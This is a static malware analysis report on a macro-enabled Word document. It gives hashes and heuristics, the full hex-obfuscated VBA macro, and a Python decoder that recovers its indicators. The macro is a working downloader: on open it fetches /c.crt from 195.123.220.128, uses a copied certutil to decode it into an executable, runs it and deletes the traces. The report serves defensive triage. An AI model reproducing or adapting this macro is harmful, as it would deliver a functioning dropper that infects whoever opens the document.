Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7f7463a14d72bbe2…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 157.2 KB
Created: 2021-02-22 19:48:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2021-03-01
MD5: ab040efa3a8efca253b7c4b8d5e31abe
SHA-1: 13dfd43a25693ea2f22b4b38529635b2134fc48a
SHA-256: 7f7463a14d72bbe27d346b0fb33f4be24b0a8248d27987b52ad9541abee8100c
Risk score: 80

Heuristics (6)

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: file:///C:\Program Files\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx
    The target is a local file:// path to a stock Office template (an attached-template reference from settings.xml), not a remote URL. On its own it is not evidence of remote template injection, although this is the same relationship type that remote-template loaders abuse; the download logic in this sample lives in the VBA project, not in this relationship.
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen runs automatically when the document is opened with macros enabled; Sub AutoOpen() in the extracted script below is the entry point of the downloader chain.
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ("appdata") resolves the current user's %APPDATA% directory, which the macro uses as the drop location for the downloaded file, for a copy of certutil.exe and for the decoded payload.
    Matched line in script
    xadxcqfbyxj = Environ("appdata")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs below are standard Office Open XML and WordprocessingML namespace identifiers declared in the document markup, not network indicators; the downloader's actual endpoint is hex-encoded inside the macro and does not appear in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8311 bytes
SHA-256: 2a783798690a2c2824f1ca754efde0be6c1ccb65a5eea7814ac70c98c3c1772f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Const yzqgjwsyhx = 2
Const bsrvqrnfck = 1
Const adfhneiepl = 0
#If VBA7 Then
Private Declare PtrSafe Function bpjevjcvethsw Lib "wininet" Alias "InternetOpenA" ( _
ByVal idaijsswnxtjhqrhgl As String, _
ByVal qthcmhydvzotmmpt As Long, _
ByVal nfrelxzrrfoupqg As String, _
ByVal jjsyuwmzvudyezhh As String, _
ByVal vatmmcbopnvyymjxifl As Long) As Long
Private Declare PtrSafe Function ezkltnaikhqoieccrskt Lib "wininet" Alias "InternetConnectA" ( _
ByVal acpoqkvvlqig As Long, _
ByVal rjfkxhle As String, _
ByVal jetolbqa As Integer, _
ByVal vxedspomutdrcairzt As String, _
ByVal rnbrocdkjeqabqwgsa As String, _
ByVal gjhcfbkf As Long, _
ByVal bbbsneseyfc As Long, _
ByVal ytbpfhbbgvnntlqembd As Long) As Long
Private Declare PtrSafe Function wlzgliazapaq Lib "wininet" Alias "HttpOpenRequestA" ( _
ByVal veyhqrewtfirjdbxqfz As Long, _
ByVal ltxligdyngnak As String, _
ByVal enwbteeogn As String, _
ByVal hpagmxihzooydklcia As String, _
ByVal kvczmjtgilanwmxmdk As String, _
ByVal jenimxnug As String, _
ByVal kckbshqbluzd As Long, _
ByVal fkevjlltcmvor As Long) As Long
Private Declare PtrSafe Function piiudzztscfh Lib "wininet" Alias "HttpSendRequestA" ( _
ByVal uhcoqbsh As Long, _
ByVal vxcfvzwerqcnefepj As String, _
ByVal pxvdcknrfsillteeoa As Long, _
ByVal gxfsmrdf As String, _
ByVal vqqjfmsqkmh As Long) As Boolean
Private Declare PtrSafe Function pfpxavmbgn Lib "wininet" Alias "InternetReadFile" ( _
ByVal qzgqlstzhunxkgtflmi As Long, _
ByVal ashduzjapj As String, _
ByVal zdjwphebgxibjpohwtfc As Long, _
ByRef gwzvlfiqqeh As Long) As Boolean
Private Declare PtrSafe Function zbzdbeqjkdiatvnon Lib "Kernel32" Alias "WinExec" ( _
ByVal bnpgjilysxokjjldwbm As String, _
ByVal aahxnbst As Long _
) As Long
Private Declare PtrSafe Function qegdkpnauwthcgu Lib "Kernel32" Alias "Sleep" ( _
ByVal yysftcwo As Long _
) As Long
Private Declare PtrSafe Function ziktndktu Lib "kernel32.dll" Alias "ziktndktuA" (ByVal yfizuliqmoaggyarob As String, ByVal tkcermptyb As String, ByVal wrgfikgc As Long) As Long
#Else
Private Declare Function bpjevjcvethsw Lib "wininet" Alias "InternetOpenA" ( _
ByVal pihunzvjjnvojhblrni As String, _
ByVal cncfcfawrvqtgi As Long, _
ByVal jogmuplkejhtwqfjjjxn As String, _
ByVal eevcrumwpogc As String, _
ByVal zsownhnsso As Long) As Long
Private Declare  Function ezkltnaikhqoieccrskt Lib alsxjfxuikzt("77696e69") & alsxjfxuikzt("6e6574") Alias alsxjfxuikzt("496e7465726e6574436f6e6e65") & alsxjfxuikzt("637441") ( _
ByVal lvmctkgradypq As Long, _
ByVal vuyiihoykrsoqixz As String, _
ByVal duwcwjzkiwqbihzcvxmr As Integer, _
ByVal jzsizkcpfuxtstwp As String, _
ByVal qwgmyzrnvczmn As String, _
ByVal xgcanvgwlkvq As Long, _
ByVal utzzkxmntjn As Long, _
ByVal gcymmmxudi As Long) As Long
Private Declare  Function wlzgliazapaq Lib alsxjfxuikzt("77696e") & alsxjfxuikzt("696e6574") Alias alsxjfxuikzt("487474704f70656e5265") & alsxjfxuikzt("717565737441") ( _
ByVal mtvuwixiinn As Long, _
ByVal tebhwdaaa As String, _
ByVal mqfhuxyuqwyqfdtq As String, _
ByVal ewcpnqdxqvhqdpla As String, _
ByVal zgvfsuai As String, _
ByVal rcptcrvwvknoy As String, _
ByVal dwteyktbfuupmelwsio As Long, _
ByVal qrpbvvnlgpfizphqn As Long) As Long
Private Declare  Function piiudzztscfh Lib alsxjfxuikzt("77696e696e65") & alsxjfxuikzt("74") Alias alsxjfxuikzt("4874747053656e") & alsxjfxuikzt("645265717565737441") ( _
ByVal ddkaxauflbewbdc As Long, _
ByVal ouutwcxv As String, _
ByVal vqhmxxvvpworerg As Long, _
ByVal kpkndlympbwpykhipof As String, _
ByVal nuiriorntlhpnxo As Long) As Boolean
Private Declare  Function pfpxavmbgn Lib alsxjfxuikzt("77696e696e65") & alsxjfxuikzt("74") Alias alsxjfxuikzt("496e7465726e6574526561") & alsxjfxuikzt("6446696c65") ( _
ByVal fhmwfwsqzufrwehh As Long, _
ByVal vkwusgloghmxtwrpwkko As String, _
ByVal ucnvxbwgsnefurgbmy As Long, _
ByRef yfskzfkzomonxehtlosy As Long) As Boolean
Private Declare  Function zbzdbeqjkdiatvnon Lib alsxjfxuikzt("4b65726e") & alsxjfxuikzt("656c3332") Alias alsxjfxuikzt("57696e") & alsxjfxuikzt("45786563") ( _
ByVal mgxltqldcnjujcw As String, _
ByVal cmriteeadp As Long _
) As Long
Private Declare  Function qegdkpnauwthcgu Lib alsxjfxuikzt("4b65726e656c") & alsxjfxuikzt("3332") Alias alsxjfxuikzt("53") & alsxjfxuikzt("6c656570") ( _
ByVal yysftcwo As Long _
) As Long
Private Declare Function ziktndktu Lib "kernel32.dll" Alias "ziktndktuA" (ByVal yfizuliqmoaggyarob As String, ByVal tkcermptyb As String, ByVal wrgfikgc As Long) As Long
#End If
Function rString()
Dim sxnyobkrdgojagviluev As Variant
Dim poqnpzddklsuoppbs As Long
Dim txwmuhwfanuildhkgjz As String
sxnyobkrdgojagviluev = Array(alsxjfxuikzt("61"), alsxjfxuikzt("62"), alsxjfxuikzt("72"), alsxjfxuikzt("66"), alsxjfxuikzt("78"), alsxjfxuikzt("61"), alsxjfxuikzt("71"), alsxjfxuikzt("6c"), alsxjfxuikzt("32"), alsxjfxuikzt("6a"))
For poqnpzddklsuoppbs = 1 To 7
Randomize
txwmuhwfanuildhkgjz = txwmuhwfanuildhkgjz & sxnyobkrdgojagviluev(Int((UBound(sxnyobkrdgojagviluev) - LBound(sxnyobkrdgojagviluev) + 1) * Rnd + LBound(sxnyobkrdgojagviluev)))
Next poqnpzddklsuoppbs
rString = txwmuhwfanuildhkgjz & alsxjfxuikzt("76")
End Function
Sub AutoOpen()
Dim rkxflbupqfffvw As String
Dim jdtmmspdelyp As String
rkxflbupqfffvw = alsxjfxuikzt("3139352e31") & alsxjfxuikzt("32332e3232302e313238")
jdtmmspdelyp = alsxjfxuikzt("2f632e63") & alsxjfxuikzt("7274")
Dim ausxqytaekelkyhtj As String
Dim xuhssmwjpmpl As String
Dim jomzwopoporss As String
Dim xadxcqfbyxj As String
Dim dhtzamhahe As Long
dhtzamhahe = bpjevjcvethsw(alsxjfxuikzt("4d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533382e3320284b48544d4c2c206c696b65204765636b") & alsxjfxuikzt("6f29204368726f6d652f38382e302e343332342e3131205361666172692f3533372e32"), adfhneiepl, vbNullString, vbNullString, adfhneiepl)
If dhtzamhahe = 0 Then
GoTo SingleExit
End If
Dim fcvplukcfvhf As Long
fcvplukcfvhf = ezkltnaikhqoieccrskt(dhtzamhahe, rkxflbupqfffvw, 80, adfhneiepl, 0, 3, adfhneiepl, adfhneiepl)
If fcvplukcfvhf = 0 Then
GoTo SingleExit
End If
Dim xtogiqqgp As Long
Dim lazpxljatcy As Long
lazpxljatcy = wlzgliazapaq(fcvplukcfvhf, alsxjfxuikzt("474554"), jdtmmspdelyp, alsxjfxuikzt("4854") & alsxjfxuikzt("54502f312e30"), vbNullString, vbNullString, &H4000000 Or &H80000, adfhneiepl)
Dim elrslzplzrufd As Boolean
elrslzplzrufd = piiudzztscfh(lazpxljatcy, vbNullString, adfhneiepl, vbNullString, adfhneiepl)
xadxcqfbyxj = Environ("appdata")
ausxqytaekelkyhtj = xadxcqfbyxj & alsxjfxuikzt("5c") & rString
jomzwopoporss = xadxcqfbyxj & alsxjfxuikzt("5c") & rString & alsxjfxuikzt("2e6578") & alsxjfxuikzt("6520")
xuhssmwjpmpl = xadxcqfbyxj & alsxjfxuikzt("5c") & rString & alsxjfxuikzt("2e") & alsxjfxuikzt("65786520")
Dim cmovoieiizt As String * 1
Dim eesnjksirt As Long
eesnjksirt = FreeFile()
Open ausxqytaekelkyhtj For Binary Access Write As eesnjksirt
Do
Dim mhxshbkdsiyzkwx As Long
elrslzplzrufd = pfpxavmbgn(lazpxljatcy, cmovoieiizt, Len(cmovoieiizt), mhxshbkdsiyzkwx)
If mhxshbkdsiyzkwx > 0 Then
Put eesnjksirt, , cmovoieiizt
End If
Loop While mhxshbkdsiyzkwx > 0
Close eesnjksirt
FileCopy alsxjfxuikzt("5c57696e646f77735c53797374656d33325c6365727475") & alsxjfxuikzt("74696c2e657865"), xuhssmwjpmpl
Dim eeotlfagqtxzvqgykj As String
eeotlfagqtxzvqgykj = Chr(34) & xuhssmwjpmpl & Chr(34) & alsxjfxuikzt("202d") & alsxjfxuikzt("6465636f646520") & Chr(34) & ausxqytaekelkyhtj & Chr(34) & alsxjfxuikzt("20") & Chr(34) & jomzwopoporss & Chr(34)
zbzdbeqjkdiatvnon eeotlfagqtxzvqgykj, 0
qegdkpnauwthcgu 1332
zbzdbeqjkdiatvnon jomzwopoporss, 0
Kill xuhssmwjpmpl
Kill ausxqytaekelkyhtj
SingleExit:
End Sub
Private Function alsxjfxuikzt(ByVal vutimzvgujum As String) As String
Dim zwigapbvalop As Long
For zwigapbvalop = 1 To Len(vutimzvgujum) Step 2
alsxjfxuikzt = alsxjfxuikzt & Chr$(Val("&H" & Mid$(vutimzvgujum, zwigapbvalop, 2)))
Next zwigapbvalop
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 41472 bytes
SHA-256: 52387690d9d046dc68714a251e7cbbab2723d8d136a48943e7cf0254ddd5f5b0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
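The macro in macros.bas hides every string behind alsxjfxuikzt(), a two-hex-digits-to-character helper (the Private Function at the end of the listing), and splits most strings across two literals joined with &, so no single literal contains a whole indicator. The Python below is a worked example added to this report; it is not code from the report, from oletools or from the sample. It reproduces the helper, decodes every concatenated run in an excerpt copied from the macros.bas preview above (embedded as the input), rewrites those lines in plaintext, and classifies the decoded strings into indicators. The wininet flag names for the HttpOpenRequestA constants, the IPv4/URI/.exe classification rules, and the drop-filename pattern derived from the rString() alphabet are this example's own assumptions, not output of the analysis pipeline.

```python
"""Decode the alsxjfxuikzt() hex-string obfuscation used by the macros.bas
listing above and recover the indicators it hides. Added example, not code
from the original report or from the sample."""
from __future__ import annotations

import re

# Constructed input: lines copied verbatim from the macros.bas preview above.
MACRO_EXCERPT = r'''
rkxflbupqfffvw = alsxjfxuikzt("3139352e31") & alsxjfxuikzt("32332e3232302e313238")
jdtmmspdelyp = alsxjfxuikzt("2f632e63") & alsxjfxuikzt("7274")
dhtzamhahe = bpjevjcvethsw(alsxjfxuikzt("4d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533382e3320284b48544d4c2c206c696b65204765636b") & alsxjfxuikzt("6f29204368726f6d652f38382e302e343332342e3131205361666172692f3533372e32"), adfhneiepl, vbNullString, vbNullString, adfhneiepl)
lazpxljatcy = wlzgliazapaq(fcvplukcfvhf, alsxjfxuikzt("474554"), jdtmmspdelyp, alsxjfxuikzt("4854") & alsxjfxuikzt("54502f312e30"), vbNullString, vbNullString, &H4000000 Or &H80000, adfhneiepl)
jomzwopoporss = xadxcqfbyxj & alsxjfxuikzt("5c") & rString & alsxjfxuikzt("2e6578") & alsxjfxuikzt("6520")
FileCopy alsxjfxuikzt("5c57696e646f77735c53797374656d33325c6365727475") & alsxjfxuikzt("74696c2e657865"), xuhssmwjpmpl
eeotlfagqtxzvqgykj = Chr(34) & xuhssmwjpmpl & Chr(34) & alsxjfxuikzt("202d") & alsxjfxuikzt("6465636f646520") & Chr(34) & ausxqytaekelkyhtj & Chr(34) & alsxjfxuikzt("20") & Chr(34) & jomzwopoporss & Chr(34)
'''

DECODER = "alsxjfxuikzt"  # the sample's hex-decoding helper
CALL_RE = re.compile(rf'{DECODER}\("([0-9A-Fa-f]*)"\)')
# One call, or several chained with VBA's & operator.
RUN_RE = re.compile(rf'{DECODER}\("[0-9A-Fa-f]*"\)(?:\s*&\s*{DECODER}\("[0-9A-Fa-f]*"\))*')

# Assumed names (wininet.h) for the dwFlags constants passed to HttpOpenRequestA.
WININET_FLAGS = {0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                 0x00080000: "INTERNET_FLAG_NO_COOKIES"}

# rString(): seven picks from this alphabet (the Array() of one-byte decodes on
# the page) followed by "v"; the %APPDATA% drops are <7 chars>v and <7 chars>v.exe.
RSTRING_ALPHABET = "".join(chr(int(h, 16)) for h in
                           ["61", "62", "72", "66", "78", "61", "71", "6c", "32", "6a"])
DROP_NAME_RE = re.compile(
    rf"^[{re.escape(''.join(sorted(set(RSTRING_ALPHABET))))}]{{7}}v(?:\.exe)?$")


def vba_hex_decode(hexstr: str) -> str:
    """Mirror of alsxjfxuikzt(): Chr$(Val("&H" & Mid$(s, i, 2))) for each 2-char slice."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def decode_runs(vba_source: str) -> list:
    """Every concatenated decoder run in the source, decoded, in source order."""
    return [vba_hex_decode("".join(CALL_RE.findall(m.group(0))))
            for m in RUN_RE.finditer(vba_source)]


def deobfuscate_line(line: str) -> str:
    """Rewrite one macro line with each decoder run replaced by its quoted plaintext."""
    return RUN_RE.sub(
        lambda m: '"' + vba_hex_decode("".join(CALL_RE.findall(m.group(0)))) + '"', line)


def wininet_flag_names(value: int) -> list:
    """Name the known bits of an HttpOpenRequestA dwFlags value; unknown bits stay hex."""
    names, rest = [], value
    for bit, name in WININET_FLAGS.items():
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return names


def is_drop_name(filename: str) -> bool:
    """True if a filename fits the pattern rString() generates for the %APPDATA% drops."""
    return DROP_NAME_RE.match(filename) is not None


def extract_iocs(vba_source: str) -> dict:
    """Classify the decoded strings into the indicators an analyst would pivot on."""
    strings = decode_runs(vba_source)
    ipv4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
    return {
        "c2_hosts": [s for s in strings if ipv4.match(s)],
        "uri_paths": [s for s in strings if s.startswith("/") and len(s) > 1],
        "user_agents": [s for s in strings if s.startswith("Mozilla/")],
        # Paths with a directory component ending in .exe; the macro's ".exe "
        # literals carry a trailing space, so strip before testing.
        "lolbins": [s.strip() for s in strings
                    if "\\" in s and s.strip().lower().endswith(".exe")],
        "certutil_switches": [s.strip() for s in strings if s.strip().startswith("-")],
    }


if __name__ == "__main__":
    for line in MACRO_EXCERPT.strip().splitlines():
        print(deobfuscate_line(line))
    print(extract_iocs(MACRO_EXCERPT))
    print(wininet_flag_names(0x4000000 | 0x80000))
```

Run against the excerpt, the decoded chain reads: InternetOpenA with a spoofed Chrome 88 user agent, InternetConnectA to 195.123.220.128 on TCP/80 (service type 3, INTERNET_SERVICE_HTTP), GET /c.crt over HTTP/1.0 with INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES, the response written one byte at a time to %APPDATA%\<7 chars from "abrfxql2j">v, certutil.exe copied from \Windows\System32 to %APPDATA%\<random>v.exe, that copy invoked as "<copy>" -decode "<download>" "<random>v.exe" to base64-decode the .crt file into an executable, Sleep for 1332 ms, WinExec of the decoded binary, then Kill of the certutil copy and the encoded download. Because rString() is called separately for each path, the three drop names differ, and the decoded payload is left on disk while the two intermediates are deleted. The payload itself is not part of this report, so no hash for it can be given here.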